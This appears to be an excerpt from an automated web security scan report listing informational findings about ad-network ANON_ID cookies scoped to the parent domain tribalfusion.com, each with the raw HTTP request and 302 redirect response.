Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=agnhF4SkTAF8iiw8fQKkDVov5ZaVtL4kAJJHuly8Q36RZdu9P8pbfCuSisKOZcKDQXiFTKbrMRNxbBWMLZc4nZcoT0pGB6BrXuUjkmNittGpjkC1xZdD9VcwQUjOl7oyFNhBoOZacm4lY8LwxcYRyGe8NT5QuZaid1S5eljpmQOJ4bQX0HdqPu0oyM7tW6LZcSZdbxkrgktqi5TrhmfRAg5KVQr6jydWeHapkSCorEY5oPPOltPZcjFH4ZcUecfVxg0mrIVGjWcQCJ7k1UAnLdnYyYE2ZccSkhge3hadCbJBYbqd17D9VI4DOSZbD8UNhRfV45JZct312BhBZaITIPBpoQBn8der0fFh4FTS6gl035o36yY73spFfW0SiTyjx0noZbZaZcQIFvxbGBf6uePjMuPtZbrfOEZbdZdsTTdqE6OpUZdBVmMdgZavYrZdcZbZbsr6DVJnXvdXZcWKCpFK8RTvU5qFce0bTXsQwsfW0ktQrmyTbRXsgHZc7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:45 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aHnEGcolXPBpF5ICZbx9eCRAPU5GNZaF4esKR22lZaqg7mRb7CZdHxWKvM0xob5KTsmd3pZbZdKGx1XC5rL2mW9GXWvUHE9wZdxDkDW4Svj0H7X4Md5lVbgcpfmldHkYSFDS7VqmNxr2XZaWuendWENLdpZbLYObWxOZbRJfF7iQLWd5n43u5HhPLmEiEwvZburLVZakYh4ZcXFQLAgcIV1TtkpCw2oLw1SmxdfZd4AvD0yyZdTwh4T5NWhXMgyCgTgPiK3gheN7n4wofOZcJucGWT5oTAcZdG6c9AuuA2a8ghEO2d8AN0Gb4OABdCZbZaI7E95PtrxZcgD8pEHZbeeRw7QvJSZaBvuBNxsXNj2AN3M1tMGMZdGs71OXnZb4UMlQssGfEQBhhmRZcgGoSxbMZcf6ZdZc3jFvIGM8wVWfIVsvkQNpsgI1JZcUl8RJ5IUutjMfIN7RRJcjTGTwVwBurbbOYwW229i5YvxCZdqjACVhhAgKpEWlL6wv7ZaDaRtgSKLJZacsZcJSIG5MpSc29ynKmOb3ZcZcZdruPaS9p2DvnSnO8dplAA6J7jabf3nWcVK7eBX1Zd8vmh4QUNqQ65qyIQMMQCpAu; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:52 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aHnEGcolXPBpF5ICZbx9eCRAPU5GNZaF4esKR22lZaqg7mRb7CZdHxWKvM0xob5KTsmd3pZbZdKGx1XC5rL2mW9GXWvUHE9wZdxDkDW4Svj0H7X4Md5lVbgcpfmldHkYSFDS7VqmNxr2XZaWuendWENLdpZbLYObWxOZbRJfF7iQLWd5n43u5HhPLmEiEwvZburLVZakYh4ZcXFQLAgcIV1TtkpCw2oLw1SmxdfZd4AvD0yyZdTwh4T5NWhXMgyCgTgPiK3gheN7n4wofOZcJucGWT5oTAcZdG6c9AuuA2a8ghEO2d8AN0Gb4OABdCZbZaI7E95PtrxZcgD8pEHZbeeRw7QvJSZaBvuBNxsXNj2AN3M1tMGMZdGs71OXnZb4UMlQssGfEQBhhmRZcgGoSxbMZcf6ZdZc3jFvIGM8wVWfIVsvkQNpsgI1JZcUl8RJ5IUutjMfIN7RRJcjTGTwVwBurbbOYwW229i5YvxCZdqjACVhhAgKpEWlL6wv7ZaDaRtgSKLJZacsZcJSIG5MpSc29ynKmOb3ZcZcZdruPaS9p2DvnSnO8dplAA6J7jabf3nWcVK7eBX1Zd8vmh4QUNqQ65qyIQMMQCpAu; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:52 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=ajnhU0OleCZcoXNxdvLZbgFDCR0ZbXUicN4aAwMydiEU8FhYk0JvdwpFopnWjoaFZbZcqZbvW8HfglHlBZaPA0gLTVAcC4v2qjOPhZdyeGu763idXiqdje3Y7HTbJfyH97QXmdE8yLL1L1gQ46YnnYZdGZdms2dcHZb0Zan5Nrh3j1wlZcHo9r9Wtnbeu9nEajEU1g15wnZard0xExVXU2ZdOZatJufn71trckZdEF6gG3ZdWg7GIcKLAbPy73MeOiOsdAZdGeyx0HZa6sYJj6oMJLxp7v2ZbyMsUr1sju2gjc0AiZaNXBsyHeMWaB062k2eLeTelKvb7dXpOyofHkeDpKLxniSYQgtZactrYj1QadNR5DrpkZayevr7bLBWKYW8S1EfEl1un2CKUr50bgBS3wdJZcK5nXkPHKvX0fDZdZahaEKXOJMK3G0crTwCZayqOJjfJYZcZaE8uZde5jDe6BOFseXQsO6sKnZcT8VXjiSxIbZcsJR67Xwsk; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ajnhU0OleCZcoXNxdvLZbgFDCR0ZbXUicN4aAwMydiEU8FhYk0JvdwpFopnWjoaFZbZcqZbvW8HfglHlBZaPA0gLTVAcC4v2qjOPhZdyeGu763idXiqdje3Y7HTbJfyH97QXmdE8yLL1L1gQ46YnnYZdGZdms2dcHZb0Zan5Nrh3j1wlZcHo9r9Wtnbeu9nEajEU1g15wnZard0xExVXU2ZdOZatJufn71trckZdEF6gG3ZdWg7GIcKLAbPy73MeOiOsdAZdGeyx0HZa6sYJj6oMJLxp7v2ZbyMsUr1sju2gjc0AiZaNXBsyHeMWaB062k2eLeTelKvb7dXpOyofHkeDpKLxniSYQgtZactrYj1QadNR5DrpkZayevr7bLBWKYW8S1EfEl1un2CKUr50bgBS3wdJZcK5nXkPHKvX0fDZdZahaEKXOJMK3G0crTwCZayqOJjfJYZcZaE8uZde5jDe6BOFseXQsO6sKnZcT8VXjiSxIbZcsJR67Xwsk; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aLnh31pki1L7uo2S6cZdfBiefhAYTcmZdPe1UlQt6sOZaYnp20LEVis7DblhuGZdWr3iUIKVAAnyk0L8ZbBH5UpVHDrWtglPFkiZcb4rOMGHaJsnWwtS6IeXOdfuOmsvSuJCsnkssoxoZbUZdPB0Q8dN1aJpj5Doj68l1wgbWooKP4Zat7tFDuxQZcZcxYZb9LdwKybZbl7AjkbDQRBt7yd4uyCj0jMu0HCv5PhUXZcS8Ck3pKbEdaVkvFDgyU6s3OMx4b5RLhRwd3O48JKmM1crsFB4G84ZclaZcp6NdFZbUT64yL4hq5O4t8y1SKdJIQKcfOF6JqYG4L3E3FMr9Gi6S4KoNTWPtkbyssxZdrZcTfovZaj9TNZcFfRKigm1RNsfZbJ45MOBjdVpYXmI8BIpUomE7QZb9NfxuwrcUD7NaC5Wh30PudDkV6kkdsunvEvBZctU1YqD59wtTyv2UgSXRmXQXZdfe1CMqRl2LldvOMEkjZcIsf; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:48 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aLnh31pki1L7uo2S6cZdfBiefhAYTcmZdPe1UlQt6sOZaYnp20LEVis7DblhuGZdWr3iUIKVAAnyk0L8ZbBH5UpVHDrWtglPFkiZcb4rOMGHaJsnWwtS6IeXOdfuOmsvSuJCsnkssoxoZbUZdPB0Q8dN1aJpj5Doj68l1wgbWooKP4Zat7tFDuxQZcZcxYZb9LdwKybZbl7AjkbDQRBt7yd4uyCj0jMu0HCv5PhUXZcS8Ck3pKbEdaVkvFDgyU6s3OMx4b5RLhRwd3O48JKmM1crsFB4G84ZclaZcp6NdFZbUT64yL4hq5O4t8y1SKdJIQKcfOF6JqYG4L3E3FMr9Gi6S4KoNTWPtkbyssxZdrZcTfovZaj9TNZcFfRKigm1RNsfZbJ45MOBjdVpYXmI8BIpUomE7QZb9NfxuwrcUD7NaC5Wh30PudDkV6kkdsunvEvBZctU1YqD59wtTyv2UgSXRmXQXZdfe1CMqRl2LldvOMEkjZcIsf; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:48 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=a8nFsew5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavelUaq0NZdkPZckBA4Zcd6lNMdrLHxBwXkxHVsqxvKvBpSCJRadFJvpjRmBv0E4NVaHw9ZdFPT77XlY0mmCZdZdAZbRvkLKnweZcGRD5VpgIDdCqQIZcZdUS3xTlncVObydYEee5m857GnDXTbvvVZafEPTF8rK8bSce61Hy4U1wka5ZbZd1iQ5jDImV3gAW7gpRbpjanM6sNXDSpvxwaBdET5IBIVubSBT3xZclS8uRXvF1Xn7tg8jZaQSqVYLqPEbIwPZcpc02IddRFeZcPU6XZdwBsU7ZaLYpFTneGaRQCnMq8TUbP27hAWxVPMC76kmGva3qbYaqyVXrjZaZdXtfHZc81XOFyNMZb76UDdyadNtZdSYxvvZdW7pxOWU9q791YOBus; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:23 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a8nFsew5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavelUaq0NZdkPZckBA4Zcd6lNMdrLHxBwXkxHVsqxvKvBpSCJRadFJvpjRmBv0E4NVaHw9ZdFPT77XlY0mmCZdZdAZbRvkLKnweZcGRD5VpgIDdCqQIZcZdUS3xTlncVObydYEee5m857GnDXTbvvVZafEPTF8rK8bSce61Hy4U1wka5ZbZd1iQ5jDImV3gAW7gpRbpjanM6sNXDSpvxwaBdET5IBIVubSBT3xZclS8uRXvF1Xn7tg8jZaQSqVYLqPEbIwPZcpc02IddRFeZcPU6XZdwBsU7ZaLYpFTneGaRQCnMq8TUbP27hAWxVPMC76kmGva3qbYaqyVXrjZaZdXtfHZc81XOFyNMZb76UDdyadNtZdSYxvvZdW7pxOWU9q791YOBus; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:23 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=annFseoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlvN7mG9ZaC3B1mnPh9cF6n9yFxSBUJilqedSUgtbul8vLrIEED2ZdoKcrUcvy88MrWhkCUgeZdjZbWXjigr5veqGUVs7IZbxDJKj5sc91eSZduRHnnONQ0SdfwQYc9NpEMyEigm2opf5bOWMi29qaDy5syYHc0Wrtkc8JRS0ZbdPsnZdyBZb9ZdDp9L1ofFRP1Si0DW9iA0OfFS73A6dbMPE3nRkEeJ6fI1jS6V5AIH7X5CcFxWZalRmqJZbLfhuXaZbZdBR66yy7BUW2d0Spr55Vu4nuYfnGPiZbboRsZap1gaZdAlnBZarxZcU147PiJv6pUn6Ie2SECLSIJAdcrUwJL5jWeGaaOUcZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:24 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annFseoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlvN7mG9ZaC3B1mnPh9cF6n9yFxSBUJilqedSUgtbul8vLrIEED2ZdoKcrUcvy88MrWhkCUgeZdjZbWXjigr5veqGUVs7IZbxDJKj5sc91eSZduRHnnONQ0SdfwQYc9NpEMyEigm2opf5bOWMi29qaDy5syYHc0Wrtkc8JRS0ZbdPsnZdyBZb9ZdDp9L1ofFRP1Si0DW9iA0OfFS73A6dbMPE3nRkEeJ6fI1jS6V5AIH7X5CcFxWZalRmqJZbLfhuXaZbZdBR66yy7BUW2d0Spr55Vu4nuYfnGPiZbboRsZap1gaZdAlnBZarxZcU147PiJv6pUn6Ie2SECLSIJAdcrUwJL5jWeGaaOUcZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:24 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

10.17. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=acn9yYr2PKMbuYn3Ycn4F5XpyFRGnTGDP2XlKn4flsYZaThCaY83G72Ttfc5CJViEZdoE1yd1Usq1ZbkfXpBHsFbApGkQGaGqZahSVsP8xUffgA1ZcJVp3fGOk7aFW4RXZdTdir1WbQPysXanCH1StdPbR7GqZauWGq8Y6I9JPro4uHhxESlZbSqZbJPt8EUtHZdhVXqPEBFUuZd4qdrX2qCIkoIyfEZaVUjyXqKZb6MKiReZdmBw1Zc3rThnZaB2yPbObsqku3t2yYFpeArR41kxK4jvH0GX38pfMAcc7tQmrno85a83b4DEKPAUQtQMl5tshRx5ZbGTn6TnNL6Eci6b9WavR62BX5N2WpqNp6pVCEj66XWGv45XZcl03UDwgInTwrFUORinp35JMdrGb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:27:34 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=246673&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1361549;type=landi756;cat=zipco403;ord=1;num=3596418555825.9487?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
